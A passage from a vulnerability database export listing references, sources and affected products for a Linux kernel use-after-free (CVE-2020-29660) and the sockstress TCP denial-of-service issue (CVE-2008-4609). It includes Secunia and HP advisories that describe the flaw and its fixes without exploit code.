        "url": "https://access.redhat.com/errata/rhsa-2021:4627"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3715"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3444"
      },
      {
        "trust": 0.1,
        "url": "https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce"
      },
      {
        "trust": 0.1,
        "url": "https://ubuntu.com/security/notices/usn-5130-1"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2021-3347"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-27825"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-28374"
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-12-09T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "date": "2021-08-05T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "date": "2021-12-15T15:27:05",
        "db": "PACKETSTORM",
        "id": "165296"
      },
      {
        "date": "2021-02-25T15:30:28",
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "date": "2021-02-25T15:30:47",
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "date": "2021-02-25T15:31:12",
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "date": "2021-02-25T15:31:02",
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "date": "2021-11-15T17:25:56",
        "db": "PACKETSTORM",
        "id": "164967"
      },
      {
        "date": "2021-11-12T17:07:48",
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "date": "2021-11-09T16:59:39",
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "date": "2021-02-28T20:12:00",
        "db": "PACKETSTORM",
        "id": "169012"
      },
      {
        "date": "2020-12-09T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "date": "2020-12-09T17:15:31.743000",
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2020-29660"
      },
      {
        "date": "2024-03-22T07:17:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      },
      {
        "date": "2021-12-16T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      },
      {
        "date": "2023-11-07T03:21:33.123000",
        "db": "NVD",
        "id": "CVE-2020-29660"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "161551"
      },
      {
        "db": "PACKETSTORM",
        "id": "161553"
      },
      {
        "db": "PACKETSTORM",
        "id": "161556"
      },
      {
        "db": "PACKETSTORM",
        "id": "161555"
      },
      {
        "db": "PACKETSTORM",
        "id": "164950"
      },
      {
        "db": "PACKETSTORM",
        "id": "164812"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      }
    ],
    "trust": 1.2
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux\u00a0Kernel\u00a0 Vulnerability in using free memory in",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-014189"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202012-776"
      }
    ],
    "trust": 0.6
  }
}

var-200810-0010
Vulnerability from variot

The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. Part of the Transmission Control Protocol (TCP) specification (RFC 1122) allows a receiver to advertise a zero byte window, instructing the sender to maintain the connection but not send additional TCP payload data. The sender should then probe the receiver to check if the receiver is ready to accept data. Narrow interpretation of this part of the specification can create a denial-of-service vulnerability. By advertising a zero receive window and acknowledging probes, a malicious receiver can cause a sender to consume resources (TCP state, buffers, and application memory), preventing the targeted service or system from handling legitimate connections. Transmission Control Protocol (TCP) Multiple implementations of service disruption (DoS) Vulnerabilities exist. RFC793 It is prescribed by Transmission Control Protocol (TCP) Implementation of service disruption due to misuse of available resources after connection establishment (DoS) Vulnerabilities exist.Service operation disrupted by a remote third party (DoS) There is a possibility of being attacked. The core TCP/IP protocol is prone to multiple remote denial-of-service vulnerabilities. The issues are tracked by Cisco Bug IDs CSCsv04836, CSCsv07712, CSCsv66169, CSCsv02768, CSCsv08325, and CSCsv08579. These issues are reported to affect multiple vendors' implementations of the TCP/IP stack. ----------------------------------------------------------------------

Do you have VARM strategy implemented?

(Vulnerability Assessment Remediation Management)

If not, then implement it through the most reliable vulnerability intelligence source on the market.

Implement it through Secunia.

For more information visit: http://secunia.com/advisories/business_solutions/

Alternatively request a call from a Secunia representative today to discuss how we can help you with our capabilities contact us at: sales@secunia.com


TITLE: Windows 2000 TCP/IP Window Size Denial of Service Vulnerabilities

SECUNIA ADVISORY ID: SA36597

VERIFY ADVISORY: http://secunia.com/advisories/36597/

DESCRIPTION: Two vulnerabilities have been reported in Microsoft Windows 2000, which can be exploited by malicious people to cause a DoS (Denial of Service).

1) An error in the TCP/IP processing can be exploited to cause a system to stop responding to new requests by flooding it using specially crafted packets with a TCP receive window size set to a very small value or zero.

2) An error in the TCP/IP processing can be exploited to cause connections to hang indefinitely in a FIN-WAIT-1 or FIN-WAIT-2 state. This can be exploited to cause a system to stop responding to new requests by flooding it using specially crafted packets with a TCP receive window size set to a very small value or zero.

SOLUTION: According to the vendor, no patches will be made available as it would require re-architecting a significant amount of the OS.

PROVIDED AND/OR DISCOVERED BY: 1) The vendor credits Jack C. Louis, Outpost24. 2) The vendor credits Felix Lindner, Recurity Labs.

ORIGINAL ADVISORY: MS09-048 (KB967723): http://www.microsoft.com/technet/security/Bulletin/MS09-048.mspx


About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.

Subscribe: http://secunia.com/advisories/secunia_security_advisories/

Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/

Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.


Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org


. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c01923093 Version: 1

HPSBMI02473 SSRT080138 rev.1 - Cisco Catalyst Blade Switch 3020/3120, Remote Denial of Service (DoS)

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2009-11-17 Last Updated: 2009-11-17

Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS)

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY A potential vulnerability has been identified with the Cisco Catalyst Blade Switch 3020/3021. The vulnerability could be exploited remotely to create a Denial of Service (DoS).

References: CVE-2008-4609, Cisco Security Advisory: TCP State Manipulation Denial of Service Vulnerabilities in Multiple Cisco Products(cisco-sa-20090908-tcp24)

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Cisco Catalyst Blade Switch 3020 for c-Class BladeSystem running firmware earlier than v12.2(50) Cisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP running firmware earlier than v12.2(50)

BACKGROUND

CVSS 2.0 Base Metrics

Reference Base Vector Base Score CVE-2008-4609 (AV:N/AC:M/Au:N/C:N/I:N/A:C) 7.1 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002

RESOLUTION

HP has provided firmware updates to resolve this vulnerability.

Product Firmware Version

Cisco Catalyst Blade Switch 3020 for c-Class BladeSystem 12.2(50) SE1 or subsequent

Cisco Catalyst Blade Switch 3120G and Cisco Catalyst Blade Switch 3120X for HP 12.2(50) SE1 or subsequent

To Locate the Firmware Update

Browse to http://www.hp.com and do the following:

Select "Support & Drivers" In Step 1 select "Download drivers and software (and firmware)" In Step 2 enter "Cisco Catalyst Blade Switch" Click on "Go" Select the desired product Select the desired Windows operating system Click on "Firmware - Blade Infrastructure"

PRODUCT SPECIFIC INFORMATION None

HISTORY Version:1 (rev.1) - 17 November 2009 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For further information, contact normal HP Services support channel.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches -check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems -verify your operating system selections are checked and save.

To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

  • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2009 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksEDAMACgkQ4B86/C0qfVm87gCgliWdpIKldzOKHRvJA5r9gR4Z ge0AoMu3ueCbIB4y3HUmT/jReUzE4jym =uBei -----END PGP SIGNATURE-----

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-200810-0010",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "ios",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "cisco",
        "version": "12.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "cisco",
        "version": "12.4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "cisco",
        "version": "12.3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "cisco",
        "version": "12.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 2.1,
        "vendor": "cisco",
        "version": "12.1"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "10"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "8"
      },
      {
        "model": "solaris",
        "scope": "eq",
        "trust": 1.8,
        "vendor": "oracle",
        "version": "9"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "12.0\\(9\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.6,
        "vendor": "cisco",
        "version": "12.0\\(5\\)wc2b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.2xv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.1xx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.1xv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.4xv"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.3xx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "cisco",
        "version": "12.0xv"
      },
      {
        "model": "catos 8.4 glx",
        "scope": null,
        "trust": 1.2,
        "vendor": "cisco",
        "version": null
      },
      {
        "model": "ios xe",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "2.1"
      },
      {
        "model": "rtx1100",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "ios xe",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "2.2"
      },
      {
        "model": "pix/asa",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "8.1"
      },
      {
        "model": "rtx1500",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rtx2000",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt57i",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "8.0"
      },
      {
        "model": "rtv700",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt300i",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "pix/asa",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "7.1"
      },
      {
        "model": "pix/asa",
        "scope": "eq",
        "trust": 1.1,
        "vendor": "cisco",
        "version": "7.2"
      },
      {
        "model": "rtx1000",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "rt250i",
        "scope": null,
        "trust": 1.1,
        "vendor": "yamaha",
        "version": null
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.20.12"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(23\\)e4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.17.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(5\\)yh3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(10.5\\)ec"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(24a\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)ja1"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.52"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sw"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)xa"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(1d\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1yj"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xy"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.19"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7a\\)ey3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(15\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(22\\)e3"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(6\\)ea2b"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(11\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xz"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)xh"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.45"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(1\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0xa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.16.7"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.23.14"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.5"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.4.9"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.34"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.8.1.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(7\\)xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(23\\)sx"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0wt"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)sxd4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(3\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(1\\)xb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(11\\)ys"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)ewa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.0.4"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.44"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2\\(9\\)p"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(2\\)xg"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2f"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "10.3\\(16\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5\\)s"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yq"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t8"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4xk"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(5c\\)"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.22.1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(2\\)t"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(5.3\\)wc1"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2yp"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2f"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.3.27"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.0\\(19\\)st"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.1\\(17\\)ct"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "11.3xa"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.39"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.11.8"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.6.12.12"
      },
      {
        "model": "openbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "openbsd",
        "version": "3.7"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(4\\)yb"
      },
      {
        "model": "netbsd",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "netbsd",
        "version": "1.4.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1gb"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.4\\(1c\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(8b\\)e20"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.2\\(18\\)so4"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3xu"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(12\\)e"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1xm"
      },
      {
        "model": "kernel",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "linux",
        "version": "2.5.18"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.1\\(7b\\)"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3\\(4\\)t2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "cisco",
        "version": "12.3jec"
